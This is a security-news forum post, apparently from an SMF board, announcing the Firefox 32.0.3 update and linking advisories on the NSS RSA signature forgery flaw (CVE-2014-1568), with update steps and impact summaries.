CVE Reference: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1568 - 7.5 (HIGH)
Sep 24 2014
Impact: Disclosure of system information, Disclosure of user information, Modification of authentication information, Modification of system information, Modification of user information
Fix Available: Yes Vendor Confirmed: Yes  
Version(s): prior to 37.0.2062.124 ...

 Exclamation Exclamation

 90 
 on: September 24, 2014, 15:14:06  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Firefox 32.0.3 released

From an admin. account, start Firefox, then >Help >About >Check for Updates ...
-or-
Download: https://www.mozilla.com/firefox/all.html

Release notes
- https://www.mozilla.org/en-US/firefox/32.0.3/releasenotes/
September 24, 2014
Fixed: 32.0.3: New security fixes can be found here*
* https://www.mozilla.org/security/known-vulnerabilities/firefox.html#firefox32.0.3
MFSA 2014-73 RSA Signature Forgery in NSS
> https://www.mozilla.org/security/announce/2014/mfsa2014-73.html

> https://www.us-cert.gov/ncas/current-activity/2014/09/24/Mozilla-Network-Security-Services-NSS-Library-Vulnerability
Sep 24, 2014

- http://www.kb.cert.org/vuls/id/772676
24 Sep 2014 - "... This vulnerability may allow an attacker to forge a RSA signature, such as a SSL certificate..."

- http://www.securitytracker.com/id/1030901
CVE Reference: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1568 - 7.5 (HIGH)
Sep 24 2014
Impact: Disclosure of system information, Disclosure of user information, Modification of authentication information, Modification of system information, Modification of user information
Fix Available: Yes Vendor Confirmed: Yes  
Version(s): prior to versions ESR 24.8.1, ESR 31.1.1, 32.0.3 ...

 Exclamation Exclamation

Pages: 1 ... 7 8 [9] 10
Powered by SMF 1.1.20 | SMF © 2013, Simple Machines Page created in 2.374 seconds with 16 queries.